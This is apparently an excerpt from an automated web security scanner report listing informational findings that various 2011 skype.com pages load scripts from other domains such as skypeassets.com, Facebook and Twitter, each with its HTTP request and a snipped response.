<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype 5.5 for Windows - Download the latest version of Skype and get free computer calls</ti
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.875. http://www.skype.com/intl/en/get-skype/on-your-mobile  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/get-skype/on-your-mobile

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/get-skype/on-your-mobile HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:59 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 47557


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>


...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>

   
           <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.876. http://www.skype.com/intl/en/get-skype/on-your-mobile/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/get-skype/on-your-mobile/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/get-skype/on-your-mobile/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:02 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 47557


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>


...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>

   
           <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.877. http://www.skype.com/intl/en/get-skype/on-your-mobile/built-in/3-skype-phone  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/get-skype/on-your-mobile/built-in/3-skype-phone

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/get-skype/on-your-mobile/built-in/3-skype-phone HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:03 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 45665

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

   
   <titl
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>

   
           <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   
<script charset="utf-8" src="http://www.skypeassets.com/i/js/animation.js" type="text/javascript" xml:space="preserve">
</script>
<script charset="utf-8" src="http://www.skypeassets.com/i/js/language-annoyance.js" type="text/javascript" xml:space="preserve">
</script>
<script charset="utf-8" src="http://www.skypeassets.com/i/js/3skypephone.js" type="text/javascript" xml:space="preserve">
</script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.878. http://www.skype.com/intl/en/get-skype/on-your-mobile/builtin/nokia-n900  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/get-skype/on-your-mobile/builtin/nokia-n900

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/get-skype/on-your-mobile/builtin/nokia-n900 HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:02 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 44419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

   
   <titl
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>

   
           <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   
<script charset="utf-8" src="http://www.skypeassets.com/i/js/animation.js" type="text/javascript" xml:space="preserve">
</script>
<script charset="utf-8" src="http://www.skypeassets.com/i/js/language-annoyance.js" type="text/javascript" xml:space="preserve">
</script>
<script charset="utf-8" src="http://www.skypeassets.com/i/js/animation.js" type="text/javascript" xml:space="preserve">
</script>
<script charset="utf-8" src="http://www.skypeassets.com/i/js/n900.js" type="text/javascript" xml:space="preserve">
</script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.879. http://www.skype.com/intl/en/get-skype/on-your-mobile/download/ipad-for-skype  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/get-skype/on-your-mobile/download/ipad-for-skype

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/get-skype/on-your-mobile/download/ipad-for-skype HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:00 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 47128


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype for iPad - iPad Video Calls - Skype</title>
   <meta name="description" content="Downlo
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.880. http://www.skype.com/intl/en/get-skype/on-your-mobile/download/ipad-for-skype/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/get-skype/on-your-mobile/download/ipad-for-skype/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/get-skype/on-your-mobile/download/ipad-for-skype/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:01 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 47128


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype for iPad - iPad Video Calls - Skype</title>
   <meta name="description" content="Downlo
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.881. http://www.skype.com/intl/en/get-skype/on-your-mobile/download/iphone-for-skype  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/get-skype/on-your-mobile/download/iphone-for-skype

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/get-skype/on-your-mobile/download/iphone-for-skype HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:00 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 44508


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Download Skype for iPhone and iPod Touch - Skype</title>
   <meta name="description" content=
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.882. http://www.skype.com/intl/en/get-skype/on-your-mobile/download/iphone-for-skype/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/get-skype/on-your-mobile/download/iphone-for-skype/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/get-skype/on-your-mobile/download/iphone-for-skype/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:00 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 44508


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Download Skype for iPhone and iPod Touch - Skype</title>
   <meta name="description" content=
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.883. http://www.skype.com/intl/en/get-skype/on-your-mobile/download/skype-for-android  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/get-skype/on-your-mobile/download/skype-for-android

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/get-skype/on-your-mobile/download/skype-for-android HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:00 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 52237


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Video Calling and Android Video Chat - Skype for Android - Skype</title>
   <meta name="descr
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.884. http://www.skype.com/intl/en/get-skype/on-your-mobile/download/skype-for-android/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/get-skype/on-your-mobile/download/skype-for-android/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/get-skype/on-your-mobile/download/skype-for-android/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:00 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 52237


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Video Calling and Android Video Chat - Skype for Android - Skype</title>
   <meta name="descr
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.885. http://www.skype.com/intl/en/get-skype/on-your-mobile/download/skype-for-symbian  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/get-skype/on-your-mobile/download/skype-for-symbian

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/get-skype/on-your-mobile/download/skype-for-symbian HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:00 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 55705


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype for Symbian ... download for your phone</title>
   <meta name="description" content="Do
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.886. http://www.skype.com/intl/en/get-skype/on-your-mobile/download/skype-for-symbian/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/get-skype/on-your-mobile/download/skype-for-symbian/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/get-skype/on-your-mobile/download/skype-for-symbian/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:01 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 55705


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype for Symbian ... download for your phone</title>
   <meta name="description" content="Do
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.887. http://www.skype.com/intl/en/get-skype/on-your-mobile/skype-on-3/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/get-skype/on-your-mobile/skype-on-3/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/get-skype/on-your-mobile/skype-on-3/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:02 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 42006

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

   
   <titl
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>

   
           <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   
<script charset="utf-8" src="http://www.skypeassets.com/i/js/animation.js" type="text/javascript" xml:space="preserve">
</script>
<script charset="utf-8" src="http://www.skypeassets.com/i/js/language-annoyance.js" type="text/javascript" xml:space="preserve">
</script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.888. http://www.skype.com/intl/en/get-skype/on-your-tv  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/get-skype/on-your-tv

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/get-skype/on-your-tv HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:03 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 49832


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>On your TV</title>
   <meta name="description" content="" />
   <meta name="keywords" content=
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.889. http://www.skype.com/intl/en/get-skype/on-your-tv/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/get-skype/on-your-tv/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/get-skype/on-your-tv/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:03 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 49832


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>On your TV</title>
   <meta name="description" content="" />
   <meta name="keywords" content=
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.890. http://www.skype.com/intl/en/get-skype/other-downloads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/get-skype/other-downloads/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/get-skype/other-downloads/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:59 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 41670


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Other Downloads - Skype</title>
   <meta name="description" content="" />
   <meta name="keywo
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.891. http://www.skype.com/intl/en/prices  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/prices

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/prices HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:04 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 42062


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Cheap Calls and Group Video Calls with Skype - Skype</title>
   <meta name="description" cont
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
